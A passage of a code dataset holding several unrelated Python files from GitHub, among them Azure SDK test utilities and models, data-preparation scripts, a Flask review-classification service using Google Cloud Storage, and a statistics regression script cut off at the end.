url_parse.urlparse(result.request.headers[\"x-recording-upstream-base-uri\"])\n upstream_uri_dict = {\n \"scheme\": upstream_uri.scheme,\n \"netloc\": upstream_uri.netloc,\n }\n original_target = parsed_result._replace(**upstream_uri_dict).geturl()\n\n result.request.url = original_target\n return result\n\n RequestsTransport.send = combined_call\n\n # call the modified function\n # we define test_variables before invoking the test so the variable is defined in case of an exception\n test_variables = None\n # this tracks whether the test has been run yet; used when calling the test function with/without `variables`\n # running without `variables` in the `except` block leads to unnecessary exceptions in test execution output\n test_run = False\n try:\n try:\n test_variables = test_func(*args, variables=variables, **trimmed_kwargs)\n test_run = True\n except TypeError as error:\n if \"unexpected keyword argument\" in str(error) and \"variables\" in str(error):\n logger = logging.getLogger()\n logger.info(\n \"This test can't accept variables as input. The test method should accept `**kwargs` and/or a \"\n \"`variables` parameter to make use of recorded test variables.\"\n )\n else:\n raise error\n # if the test couldn't accept `variables`, run the test without passing them\n if not test_run:\n test_variables = test_func(*args, **trimmed_kwargs)\n\n except ResourceNotFoundError as error:\n error_body = ContentDecodePolicy.deserialize_from_http_generics(error.response)\n message = error_body.get(\"message\") or error_body.get(\"Message\")\n error_with_message = ResourceNotFoundError(message=message, response=error.response)\n six.raise_from(error_with_message, error)\n\n finally:\n RequestsTransport.send = original_transport_func\n stop_record_or_playback(test_id, recording_id, test_variables)\n\n return test_variables\n\n return record_wrap\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"tools/azure-sdk-tools/devtools_testutils/proxy_testcase.py","file_name":"proxy_testcase.py","file_ext":"py","file_size_in_byte":10348,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"5815324155","text":"## splitXY\n## Splits the original dataset as downloaded from Kaggle and renames the files\n## \n\nimport os\nimport glob\nimport shutil \n\nDATASET_DIR_NAME = 'S7-ISP-Dataset'\nNEW_DATASET_DIR_NAME = 'S7-ISP-Dataset-Sorted'\nBASE_PATH = os.getcwd()\nDATA_PATH = os.path.join(BASE_PATH,DATASET_DIR_NAME) # This should be the path to the S7 dataset as downloaded from Kaggle\nNEW_DATA_PATH = os.path.join(BASE_PATH,NEW_DATASET_DIR_NAME) # Split dataset will be saved here\nif not os.path.isdir(NEW_DATA_PATH): os.mkdir(NEW_DATA_PATH)\n\n########### Short exposure ##########\nNEW_DATASET_SHORT_EXPOSURE_PATH = os.path.join(NEW_DATA_PATH,'S7-ISP-Short-Exposure')\nif not os.path.isdir(NEW_DATASET_SHORT_EXPOSURE_PATH): os.mkdir(NEW_DATASET_SHORT_EXPOSURE_PATH)\nNEW_PATH_X = os.path.join(NEW_DATASET_SHORT_EXPOSURE_PATH,'X')\nif not os.path.isdir(NEW_PATH_X): os.mkdir(NEW_PATH_X)\nNEW_PATH_Y = os.path.join(NEW_DATASET_SHORT_EXPOSURE_PATH,'Y')\nif not os.path.isdir(NEW_PATH_Y): os.mkdir(NEW_PATH_Y)\n######### Medium exposure ##########\n# Not needed for now\n\n# Loop through each folder inside the top folder of the dataset as downloaded from Kaggle\n# Put each short exposure dng in NEW_PATH_X and each medium exposure (ground truth) in NEW_PATH_Y\n# The name of each image is changed to the name of the folder it belonged to. This way the names completeley match\nfor dirname in os.listdir(DATA_PATH):\n DNGs = glob.glob(DATA_PATH+\"/\"+dirname+\"/\"+\"*.dng\") #list of full paths to dng\n JPGs = glob.glob(DATA_PATH+\"/\"+dirname+\"/\"+\"*.jpg\") #list of full paths to jpg\n for dng_path, jpg_path in zip(DNGs,JPGs):\n dng_name = dng_path.split('/')[-1]\n jpg_name = jpg_path.split('/')[-1]\n if dng_name.split('_')[0] == 'short':\n shutil.copy(dng_path, os.path.join(NEW_PATH_X,dirname+'.dng'))\n if jpg_name.split('_')[0] == 'medium':\n shutil.copy(jpg_path, os.path.join(NEW_PATH_Y,dirname+'.jpg')) \n\n","repo_name":"alexanderhankin/Deep_Learning-based_ISP_ee193-03_project","sub_path":"DeepISP/src/splitXY.py","file_name":"splitXY.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3605029042","text":"import sys\nfrom typing import Any, List, Optional, TYPE_CHECKING, Union\n\nfrom ... import _serialization\n\nif sys.version_info >= (3, 9):\n from collections.abc import MutableMapping\nelse:\n from typing import MutableMapping # type: ignore # pylint: disable=ungrouped-imports\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from .. import models as _models\nJSON = MutableMapping[str, Any] # pylint: disable=unsubscriptable-object\n\n\nclass PolicyAssignment(_serialization.Model):\n \"\"\"The policy assignment.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar id: The ID of the policy assignment.\n :vartype id: str\n :ivar type: The type of the policy assignment.\n :vartype type: str\n :ivar name: The name of the policy assignment.\n :vartype name: str\n :ivar display_name: The display name of the policy assignment.\n :vartype display_name: str\n :ivar policy_definition_id: The ID of the policy definition.\n :vartype policy_definition_id: str\n :ivar scope: The scope for the policy assignment.\n :vartype scope: str\n :ivar parameters: Required if a parameter is used in policy rule.\n :vartype parameters: JSON\n :ivar description: This message will be part of response in case of policy violation.\n :vartype description: str\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"type\": {\"key\": \"type\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"display_name\": {\"key\": \"properties.displayName\", \"type\": \"str\"},\n \"policy_definition_id\": {\"key\": \"properties.policyDefinitionId\", \"type\": \"str\"},\n \"scope\": {\"key\": \"properties.scope\", \"type\": \"str\"},\n \"parameters\": {\"key\": \"properties.parameters\", \"type\": \"object\"},\n \"description\": {\"key\": \"properties.description\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n type: Optional[str] = None,\n name: Optional[str] = None,\n display_name: Optional[str] = None,\n policy_definition_id: Optional[str] = None,\n scope: Optional[str] = None,\n parameters: Optional[JSON] = None,\n description: Optional[str] = None,\n **kwargs: Any\n ) -> None:\n \"\"\"\n :keyword type: The type of the policy assignment.\n :paramtype type: str\n :keyword name: The name of the policy assignment.\n :paramtype name: str\n :keyword display_name: The display name of the policy assignment.\n :paramtype display_name: str\n :keyword policy_definition_id: The ID of the policy definition.\n :paramtype policy_definition_id: str\n :keyword scope: The scope for the policy assignment.\n :paramtype scope: str\n :keyword parameters: Required if a parameter is used in policy rule.\n :paramtype parameters: JSON\n :keyword description: This message will be part of response in case of policy violation.\n :paramtype description: str\n \"\"\"\n super().__init__(**kwargs)\n self.id = None\n self.type = type\n self.name = name\n self.display_name = display_name\n self.policy_definition_id = policy_definition_id\n self.scope = scope\n self.parameters = parameters\n self.description = description\n\n\nclass PolicyAssignmentListResult(_serialization.Model):\n \"\"\"List of policy assignments.\n\n :ivar value: An array of policy assignments.\n :vartype value: list[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment]\n :ivar next_link: The URL to use for getting the next set of results.\n :vartype next_link: str\n \"\"\"\n\n _attribute_map = {\n \"value\": {\"key\": \"value\", \"type\": \"[PolicyAssignment]\"},\n \"next_link\": {\"key\": \"nextLink\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n value: Optional[List[\"_models.PolicyAssignment\"]] = None,\n next_link: Optional[str] = None,\n **kwargs: Any\n ) -> None:\n \"\"\"\n :keyword value: An array of policy assignments.\n :paramtype value: list[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyAssignment]\n :keyword next_link: The URL to use for getting the next set of results.\n :paramtype next_link: str\n \"\"\"\n super().__init__(**kwargs)\n self.value = value\n self.next_link = next_link\n\n\nclass PolicyDefinition(_serialization.Model):\n \"\"\"The policy definition.\n\n Variables are only populated by the server, and will be ignored when sending a request.\n\n :ivar id: The ID of the policy definition.\n :vartype id: str\n :ivar name: The name of the policy definition.\n :vartype name: str\n :ivar policy_type: The type of policy definition. Possible values are NotSpecified, BuiltIn,\n and Custom. Known values are: \"NotSpecified\", \"BuiltIn\", and \"Custom\".\n :vartype policy_type: str or ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyType\n :ivar mode: The policy definition mode. Possible values are NotSpecified, Indexed, and All.\n Known values are: \"NotSpecified\", \"Indexed\", and \"All\".\n :vartype mode: str or ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyMode\n :ivar display_name: The display name of the policy definition.\n :vartype display_name: str\n :ivar description: The policy definition description.\n :vartype description: str\n :ivar policy_rule: The policy rule.\n :vartype policy_rule: JSON\n :ivar metadata: The policy definition metadata.\n :vartype metadata: JSON\n :ivar parameters: Required if a parameter is used in policy rule.\n :vartype parameters: JSON\n \"\"\"\n\n _validation = {\n \"id\": {\"readonly\": True},\n \"name\": {\"readonly\": True},\n }\n\n _attribute_map = {\n \"id\": {\"key\": \"id\", \"type\": \"str\"},\n \"name\": {\"key\": \"name\", \"type\": \"str\"},\n \"policy_type\": {\"key\": \"properties.policyType\", \"type\": \"str\"},\n \"mode\": {\"key\": \"properties.mode\", \"type\": \"str\"},\n \"display_name\": {\"key\": \"properties.displayName\", \"type\": \"str\"},\n \"description\": {\"key\": \"properties.description\", \"type\": \"str\"},\n \"policy_rule\": {\"key\": \"properties.policyRule\", \"type\": \"object\"},\n \"metadata\": {\"key\": \"properties.metadata\", \"type\": \"object\"},\n \"parameters\": {\"key\": \"properties.parameters\", \"type\": \"object\"},\n }\n\n def __init__(\n self,\n *,\n policy_type: Optional[Union[str, \"_models.PolicyType\"]] = None,\n mode: Optional[Union[str, \"_models.PolicyMode\"]] = None,\n display_name: Optional[str] = None,\n description: Optional[str] = None,\n policy_rule: Optional[JSON] = None,\n metadata: Optional[JSON] = None,\n parameters: Optional[JSON] = None,\n **kwargs: Any\n ) -> None:\n \"\"\"\n :keyword policy_type: The type of policy definition. Possible values are NotSpecified, BuiltIn,\n and Custom. Known values are: \"NotSpecified\", \"BuiltIn\", and \"Custom\".\n :paramtype policy_type: str or ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyType\n :keyword mode: The policy definition mode. Possible values are NotSpecified, Indexed, and All.\n Known values are: \"NotSpecified\", \"Indexed\", and \"All\".\n :paramtype mode: str or ~azure.mgmt.resource.policy.v2016_12_01.models.PolicyMode\n :keyword display_name: The display name of the policy definition.\n :paramtype display_name: str\n :keyword description: The policy definition description.\n :paramtype description: str\n :keyword policy_rule: The policy rule.\n :paramtype policy_rule: JSON\n :keyword metadata: The policy definition metadata.\n :paramtype metadata: JSON\n :keyword parameters: Required if a parameter is used in policy rule.\n :paramtype parameters: JSON\n \"\"\"\n super().__init__(**kwargs)\n self.id = None\n self.name = None\n self.policy_type = policy_type\n self.mode = mode\n self.display_name = display_name\n self.description = description\n self.policy_rule = policy_rule\n self.metadata = metadata\n self.parameters = parameters\n\n\nclass PolicyDefinitionListResult(_serialization.Model):\n \"\"\"List of policy definitions.\n\n :ivar value: An array of policy definitions.\n :vartype value: list[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyDefinition]\n :ivar next_link: The URL to use for getting the next set of results.\n :vartype next_link: str\n \"\"\"\n\n _attribute_map = {\n \"value\": {\"key\": \"value\", \"type\": \"[PolicyDefinition]\"},\n \"next_link\": {\"key\": \"nextLink\", \"type\": \"str\"},\n }\n\n def __init__(\n self,\n *,\n value: Optional[List[\"_models.PolicyDefinition\"]] = None,\n next_link: Optional[str] = None,\n **kwargs: Any\n ) -> None:\n \"\"\"\n :keyword value: An array of policy definitions.\n :paramtype value: list[~azure.mgmt.resource.policy.v2016_12_01.models.PolicyDefinition]\n :keyword next_link: The URL to use for getting the next set of results.\n :paramtype next_link: str\n \"\"\"\n super().__init__(**kwargs)\n self.value = value\n self.next_link = next_link\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/resources/azure-mgmt-resource/azure/mgmt/resource/policy/v2016_12_01/models/_models_py3.py","file_name":"_models_py3.py","file_ext":"py","file_size_in_byte":9358,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"15264024354","text":"#! /usr/bin/env python\n#coding=utf-8\n\n'''\n本模块实现从原始数据转换成'dataproc'模块所需格式数据的功能。\n同时,也提供了原始数据完整性和正确性的检查(注:此功能暂未完全实现)。\n'''\n\n__author__ = 'hstaos@gmail.com (Huang Shitao)'\n\n\nimport logging\n\n\nclass DataAccess:\n\n def __init__(self, _raw):\n if 0 > check(_raw):\n logging.warning(\"The raw data is bad.\")\n raise ValueError(\"The raw data is bad.\")\n self.raw = _raw\n\n def get_level_data(self):\n data = []\n for _level in self.raw[\"_def\"][\"_level\"]:\n data.append((_level[\"_id\"], _level[\"_pid\"]))\n return data\n\n def get_evals(self):\n data = []\n for _eval in self.raw[\"_res\"][\"_eval\"]:\n data.append((_eval[\"_level_id\"], _eval[\"_class_id\"]))\n return data\n\n def get_classes(self):\n data = []\n for _class in self.raw[\"_def\"][\"_class\"]:\n data.append((_class[\"_id\"], _class[\"_value\"]))\n return data\n\n def get_weight_result(self):\n data = []\n for _weight in self.raw[\"_res\"][\"_weight\"]:\n data.append((_weight[\"_level_id1\"], _weight[\"_level_id2\"], _weight[\"_value\"]))\n return data\n\n\ndef check(raw):\n '''检查原始数据的正确性和完整性'''\n if raw is None:\n return -1\n try:\n if None == raw[\"_def\"][\"_level\"]:\n return -1\n if None == raw[\"_def\"][\"_class\"]:\n return -1\n if None == raw[\"_res\"][\"_eval\"]:\n return -1\n if None == raw[\"_res\"][\"_weight\"]:\n return -1\n except:\n return -1\n return 0\n","repo_name":"hstaos/fuzzy-risk-evaluation-server","sub_path":"bin/dataaccess.py","file_name":"dataaccess.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"7687262813","text":"# -*- coding: utf-8 -*-\n# @Time : 2/11/23 4:07 PM\n# @FileName: forget.py\n# @Software: PyCharm\n# @Github :sudoskys\nimport math\n\n\n# 稳定性\ndef forget(sim, hour, rank=0.5):\n S = sim * rank\n # 一天的时间\n R = math.exp(hour * math.log(0.9) / S)\n return R\n\n\nprint(forget(sim=0.5, hour=0.01) * 100)\n","repo_name":"aiastia-bak/llm-kira","sub_path":"lab/forget.py","file_name":"forget.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"10373373077","text":"# TestTreeVQ.py\nimport unittest\nimport TreeVQ\nfrom Vector import Vector\n\nclass TestTreeVQ(unittest.TestCase):\n def testQuantise_oneElement(self):\n N1 = TreeVQ.VQNode(None, None, Vector([1,0,0,0]))\n t = TreeVQ.TreeVQ(N1)\n\n self.failUnlessEqual(t.quantise(Vector([0,0,0,0])), Vector([1,0,0,0]), \"Quantiser did not return correct element\")\n\n def testQuantise_threeElements(self):\n N3 = TreeVQ.VQNode(None, None, Vector([-1,0,0,0]))\n N2 = TreeVQ.VQNode(None, None, Vector([ 1,0,0,0]))\n N1 = TreeVQ.VQNode(N2 , N3 , Vector([ 0,0,0,0]))\n t = TreeVQ.TreeVQ(N1)\n\n self.failUnlessEqual(t.quantise(Vector([ 0.1,0,0,0])), Vector([ 1,0,0,0]), \"Quantiser did not return correct element\")\n self.failUnlessEqual(t.quantise(Vector([-0.1,0,0,0])), Vector([-1,0,0,0]), \"Quantiser did not return correct element\")\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"milesvp/pokerbot","sub_path":"TreeVQ/TestTreeVQ.py","file_name":"TestTreeVQ.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13737656609","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 27 09:39:36 2023\n\n@author: drago\n\"\"\"\n\nimport json\nimport pandas as pd\nimport os\n\nos.chdir('C:/Users/drago/Downloads/APTI-HGA/proyecto/baseDatos')\ndictionary = {}\ncount = 0\nentidad_tmp = \"\"\ninicio = 0\n\nmunicipios = pd.DataFrame()\n\nmunicipios = pd.read_csv(\"Municipios.csv\")\nentidad_texto = municipios[['entidad', 'municipio']]\n# municipios_texto = municipios['municipio']\n# entidad_texto = [str(x) for x in entidad_texto]\n# municipios_texto = [str(x) for x in municipios_texto]\n# entidad_texto = [x.lower() for x in entidad_texto]\n# municipios_texto = [x.lower() for x in municipios_texto]\n# print(\"MUNICIPIOS\")\n# print(municipios)\n# print(\"\\n\")\n\nlista_entidad = [x.lower() for x in list(entidad_texto['entidad'])]\nlista_municipio = [x.lower() for x in list(entidad_texto['municipio'])]\n\n# print(lista_entidad)\n# print(len(lista_entidad))\n\nfor i in range(len(lista_entidad)):\n # Definición de diccionario\n if lista_entidad[i] not in dictionary.keys():\n dictionary[lista_entidad[i]] = [lista_municipio[i]]\n else:\n dictionary[lista_entidad[i]].append(lista_municipio[i])\n\nprint(\"DICCIONARIO: \")\nprint(dictionary)\n \ntf = open(\"../municipios.json\", \"w\")\njson.dump(dictionary, tf)\ntf.close()","repo_name":"BattiestWinter/APTI-HGA","sub_path":"proyecto/municipios.py","file_name":"municipios.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16045192342","text":"import os\nimport json\nimport csv\n\n# Se importa Flask y otras funciones necesarias\n# para crear una aplicación web.\nfrom flask import Flask, request, jsonify\n\n# Se importa la función de pipeline de la biblioteca de\n# procesamiento de lenguaje natural \"transformers\".\nfrom transformers import pipeline\n\n# Este módulo proporciona acceso a la plataforma de almacenamiento de\n# Google Cloud, que permite almacenar y acceder a archivos en la nube.\nfrom google.cloud import storage\n\ngClassifier = None\n\n# Se definen las etiquetas candidatas para la clasificación.\ngCandidateLabels = [\"insulto\", \"enojado\", \"negativo\", \"queja\"]\n\n# Se define una plantilla de hipótesis para utilizar\n# con el clasificador.\ngHypothesysTemplate = \"Esta reseña es {}.\" \n\n# Máxima calificación a ser otenida por una\n# evaluación de reseña.\ngMaxScore = 0.4\n\n# Lista de los meses del año en español.\ngMonths = [\n \"enero\",\n \"febrero\",\n \"marzo\",\n \"abril\",\n \"mayo\",\n \"junio\",\n \"julio\",\n \"agosto\",\n \"septiembre\",\n \"octubre\",\n \"noviembre\",\n \"diciembre\"\n]\n\n# Nombre del bucket de Google Cloud Storage donde se encuentran los archivos.\ngCLOUD_BUCKET = 'bucket-analitica-qa'\n\n# Nombre del archivo JSON en el bucket.\ngCLOUD_BLOB_JSON : str = 'data_json/comentarios-youtube.json'\n\n# Nombre del archivo CSV que se guardará en el bucket.\ngCLOUD_BLOB_CSV : str = 'data_csv/comentarios-youtube.csv'\n\n# Se obtiene el valor del puerto a utilizar para la aplicación\n# web desde una variable de entorno.\ngPORT = os.getenv('PORT', default = None)\nprint(\"PORT:\", gPORT)\n\n# Se crea una instancia de Flask y se asigna a la\n# variable \"app\" como aplicación web.\napp = Flask(__name__)\n\n# Se define una función para verificar si una lista de texto\n# de entrada cuales son reseñas negativas por el clasificador.\ndef verify_list(iList: list[str], iClassifier, iMinValue: float) -> list[bool]:\n # Se ejecuta el clasificador con el texto de entrada.\n vResult = iClassifier(\n iList,\n candidate_labels = gCandidateLabels,\n hypothesis_template = gHypothesysTemplate\n )\n \n # Se verifica si las puntuaciones obtenidas por el clasificador\n # es mayor al valor mínimo especificado.\n vResult = list(map(\n lambda x:\n True if max(x[\"scores\"]) > iMinValue else False,\n vResult\n ))\n return vResult\n\n# Se define una función para verificar si el texto de entrada\n# es considerado negativo por el clasificador.\ndef verify_text(iInputText: str, iClassifier, iMinValue: float) -> bool:\n\n # Si el texto es vacío o nulo, se devuelve False.\n if (not iInputText) or len(iInputText) == 0:\n return False\n \n # Se ejecuta el clasificador con el texto de entrada.\n vResult = iClassifier(\n iInputText,\n candidate_labels = gCandidateLabels,\n hypothesis_template = gHypothesysTemplate\n )\n \n # Se verifica si alguna de las puntuaciones obtenidas por\n # el clasificador es mayor al valor mínimo especificado.\n return max(vResult['scores']) > iMinValue\n\n# Obtiene los datos en formato JSON desde el bucket de Google Cloud Storage.\ndef get_json():\n # Crea un cliente(conexión) de Google Cloud Storage\n vClient = storage.Client()\n \n # Obtiene conexión al bucket.\n vBucket = vClient.get_bucket(gCLOUD_BUCKET)\n \n # Obtiene el blob (archivo) del bucket.\n vBlob = vBucket.get_blob(gCLOUD_BLOB_JSON)\n \n # Descarga el blob(archivo) JSON en una cadena de texto.\n vJSON_Data = vBlob.download_as_string()\n \n # Convierte la cadena de texto JSON en un diccionario Python.\n vJSON_Data = json.loads(vJSON_Data)\n return vJSON_Data\n\n# Esta función recibe una lista de diccionarios y escribe cada uno de ellos en un archivo CSV.\ndef write_csv(iJsonData : list[ dict[ str, any ] ], iMin : int, iMax : int) -> str:\n # Genera el nombre archivo del archivo con formato \"datos-000000-000000.csv\".\n vFileName : str = f\"datos-{iMin:06d}-{iMax:06d}.csv\"\n # Abre el archivo CSV en modo escritura\n with open(vFileName, 'w', encoding = 'UTF-8', newline='') as vFile:\n # Especifica los nombres de las columnas\n vFieldNames = [\n 'valoracion',\n 'comentario',\n 'fecha',\n 'valoracion_number',\n 'score',\n 'day',\n 'month',\n 'month_string',\n 'year',\n 'date_review',\n 'prediction'\n ]\n # Crea un objeto DictWriter para escribir el archivo CSV.\n vWriter = csv.DictWriter(vFile, fieldnames = vFieldNames)\n # Escribe la primera fila con los nombres de las columnas.\n vWriter.writeheader()\n # Escribe las filas restantes con los datos de cada diccionario.\n vWriter.writerows(iJsonData)\n return vFileName\n\n# Esta función sube el archivo CSV al bucket de Google Cloud Storage\ndef save_csv_in_bucket(iCsvFileName : str) -> None:\n # Crea un cliente de Google Cloud Storage.\n vClient = storage.Client()\n # Selecciona el bucket.\n vBucket = vClient.get_bucket(gCLOUD_BUCKET)\n # Crea un blob en el bucket.\n vBlob = vBucket.blob(gCLOUD_BLOB_CSV)\n # Abre el archivo CSV en modo lectura binaria.\n with open(iCsvFileName, 'rb') as vFile:\n # Sube el archivo al blob.\n vBlob.upload_from_file(vFile)\n\n# Esta función recibe un mes en forma de cadena de\n# texto y devuelve su número y nombre completo.\ndef get_month(iMonth: str) -> str:\n # Recorre la lista de meses\n for i, vM in enumerate(gMonths):\n # Si el mes está en la cadena de\n # texto, devuelve su índice y nombre.\n if vM in iMonth:\n return i, vM\n # Si no se ha encontrado el mes, devuelve -1 y None.\n return -1, None\n\n# Se define una ruta para la aplicación web que utiliza el\n# método GET.\n@app.route('/', methods = ['GET'])\ndef clasifica_texto():\n # Se carga el modelo machine learning para predecir la categoría\n # de una queja del call-center.\n # El modelo se basa en BERT y está preparado para procesar\n # texto en español.\n global gClassifier\n if gClassifier is None:\n gClassifier = pipeline(\"zero-shot-classification\", model = \"./local_model_pretrained\")\n \n # Se obtiene el texto a clasificar desde el parámetro \"text\" de la petición.\n vInputText = request.args.get(\"text\")\n \n # Se verifica si la reseña es negativa.\n vFlag = verify_text(\n vInputText,\n gClassifier,\n gMaxScore\n )\n \n # Se construye la respuesta JSON.\n vResult = {\n \"status\": \"OK\",\n \"response\": (\"reseña negativa\" if vFlag else \"reseña positiva\"),\n \"response-bool\": vFlag\n }\n \n # Convierte un diccionario Python a formato JSON.\n return jsonify(vResult)\n\n# Procesa los datos de un archivo guardado en un JSON y guarda\n# los resultados en un archivo CSV en un Bucket. \n@app.route('/process_json')\ndef process_json():\n # Se obtiene el texto a clasificar desde el parámetro \"text\" de la petición.\n vIndexMin = str(request.args.get(\"index_min\"))\n vIndexMax = str(request.args.get(\"index_max\"))\n \n # Se verifica que los valores de índices sean válidos.\n if vIndexMin is None \\\n or vIndexMax is None \\\n or int(vIndexMin) < 0 \\\n or int(vIndexMax) < 0:\n vResult = {\n \"status\": \"error\",\n \"error\": \"Invalid input index [\"+ vIndexMin + \", \" + vIndexMax + \"].\"\n }\n return jsonify(vResult)\n\n # Convierte los índices en datos númericos válidos.\n vIndexMin = int(vIndexMin)\n vIndexMax = int(vIndexMax)\n\n # Obtiene los datos del JSON dentro del rango de índices.\n vJSON_Data = get_json()[vIndexMin : vIndexMax]\n \n # Se carga el modelo machine learning para predecir la categoría\n # de una queja del call-center.\n # El modelo se basa en BERT y está preparado para procesar\n # texto en español.\n global gClassifier\n if gClassifier is None:\n gClassifier = pipeline(\"zero-shot-classification\", model = \"./local_model_pretrained\")\n \n # Obtiene una lista con las reseñas públicadas y obtiene su predicción.\n vResult = list(map(lambda x: x[\"comentario\"], vJSON_Data))\n vResult = verify_list(vResult, gClassifier, gMaxScore)\n \n # Recorre los datos del JSON y extrae información revelante.\n for i, vData in enumerate(vJSON_Data):\n # Añade un campo al diccionario con solamente el valor númerico de la reseña.\n vData[\"valoracion_number\"] = vData[\"valoracion\"][12]\n # Añade un campo al diccionario con el score, calculado como el valor de la valoración dividido entre 5.\n vData[\"score\"] = float(vData[\"valoracion\"][12])/5\n # Añade un campo al diccionario con el día extraído de la fecha.\n vData[\"day\"] = int(vData[\"fecha\"][0:2])\n # Añade dos campos al diccionario con el índice del mes y el nombre del mes extraídos de la fecha.\n vData[\"month\"], vData[\"month_string\"] = get_month(vData[\"fecha\"])\n # Añade un campo al diccionario con el año extraído de la fecha.\n vData[\"year\"] = int(vData[\"fecha\"][-4:len(vData[\"fecha\"])])\n # Convierte la fecha en formate DD/MM/YYYY\n vData[\"date_review\"] = f'{vData[\"day\"]:02d}/{vData[\"month\"]:02d}/{vData[\"year\"]:04d}'\n # Se asgina la predicción de la reseña del comentario.\n vData[\"prediction\"] = vResult[i]\n \n # Escribe los datos modificados en un archivo CSV y obtiene su nombre\n vCsvFileName = write_csv(vJSON_Data, vIndexMin, vIndexMax)\n \n # Guarda el archivo CSV en el bucket.\n save_csv_in_bucket(vCsvFileName)\n \n # Crea la respuesta JSON de la petición GET.\n vResult = {\n \"status\": \"ok\"\n }\n return jsonify(vResult)\n\n# Si este archivo es ejecutado directamente, se despliega un servidor de pruebas para depuración.\nif __name__ == \"__main__\":\n # Si no se proporciona un puerto, se usa el puerto 8000 por defecto.\n gPORT = gPORT if gPORT is not None else 8000\n print(\"Development server running in port: \", gPORT)\n app.run(\n host = \"0.0.0.0\",\n port = gPORT,\n debug = True\n )","repo_name":"JohanValero/TextZeroShotAPI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10150,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43582735791","text":"\r\n\r\n###############\r\n# Authored by Weisheng Jiang\r\n# Book 6 | From Basic Arithmetic to Machine Learning\r\n# Published and copyrighted by Tsinghua University Press\r\n# Beijing, China, 2022\r\n###############\r\n\r\n\r\n# single variate regression\r\n\r\n# initializations and download results \r\nimport pandas as pd\r\nimport pandas_datareader as web\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.stats as stats\r\nimport pandas_datareader as web\r\nimport statsmodels.api as sm\r\n\r\n\r\ny_levels_df = web.get_data_yahoo(['AAPL'], start = '2020-01-01', end = '2020-12-31')\r\n\r\ny_levels_df.round(2).head()\r\ny_df = y_levels_df['Adj Close'].pct_change()\r\ny_df = y_df.dropna()\r\n\r\n\r\nx_levels_df = web.get_data_yahoo(['^GSPC'], start = '2020-01-01', end = '2020-12-31')\r\n\r\nx_levels_df.round(2).head()\r\nx_df = x_levels_df['Adj Close'].pct_change()\r\nx_df = x_df.dropna()\r\n\r\nx_df = x_df.rename(columns={\"^GSPC\": \"SP500\"})\r\n\r\n#%% OLS Regression\r\n\r\n# add a column of ones\r\nX_df = sm.add_constant(x_df)\r\n\r\nmodel = sm.OLS(y_df, X_df)\r\nresults = model.fit()\r\nprint(results.summary())\r\n\r\n#%% Obtain the ANOVA table \r\n\r\nfrom statsmodels.formula.api import ols\r\n\r\ndata = pd.DataFrame({'x': x_df['SP500'], 'y': y_df['AAPL']})\r\n\r\n# Fit the model\r\nmodel_V2 = ols(\"y ~ x\", data).fit()\r\n\r\nfrom statsmodels.stats.anova import anova_lm\r\nanova_results = anova_lm(model_V2, typ=1)\r\n\r\nprint(anova_results)\r\n\r\n#%% Analysis of Variance\r\n\r\ny_mean = y_df.mean()\r\n\r\n# Sum of Squares for Total, SST\r\nSST = ((y_df - y_mean)**2).sum()\r\nn = len(y_df)\r\n# degree of freedom total, DFT\r\nDFT = n - 1\r\n# mean square total, MST\r\nMST = SST/DFT\r\n\r\n# predicted\r\ny_hat = results.fittedvalues\r\n\r\ny_hat = y_hat.to_frame()\r\ny_hat = y_hat.rename(columns={0: 'AAPL'})\r\n \r\n# Sum of Squares for Regression, SSR\r\nSSR = ((y_hat - y_mean)**2).sum()\r\n# degrees of freedom for regression model\r\nDFR = 1\r\n# MSR: mean square regression\r\nMSR = SSR/DFR\r\n\r\n# Sum of Squares for Error, SSE\r\nSSE = ((y_df - y_hat)**2).sum()\r\n# degrees of freedom for error, DFE\r\nDFE = n - DFR - 1\r\n# mean squared error, MSE\r\nMSE = SSE/DFE\r\n\r\n\r\n#%% Goodness of fit\r\n\r\n# coefficient of determination, R squared\r\n\r\nR2 = SSR/SST\r\n\r\nR2_adj = 1 - MSE/MST\r\n\r\n#%% F-test\r\n\r\nF_test = MSR/MSE\r\n\r\nN = results.nobs\r\nk = results.df_model+1\r\ndfm, dfe = k-1, N - k\r\nF = results.mse_model / results.mse_resid\r\nimport scipy.stats as stats\r\np = 1.0 - stats.f.cdf(F,dfm,dfe)\r\n\r\n\r\nalpha = 0.01\r\n# F = 549.7\r\n# n = 252\r\n# D = 1\r\n# p = D + 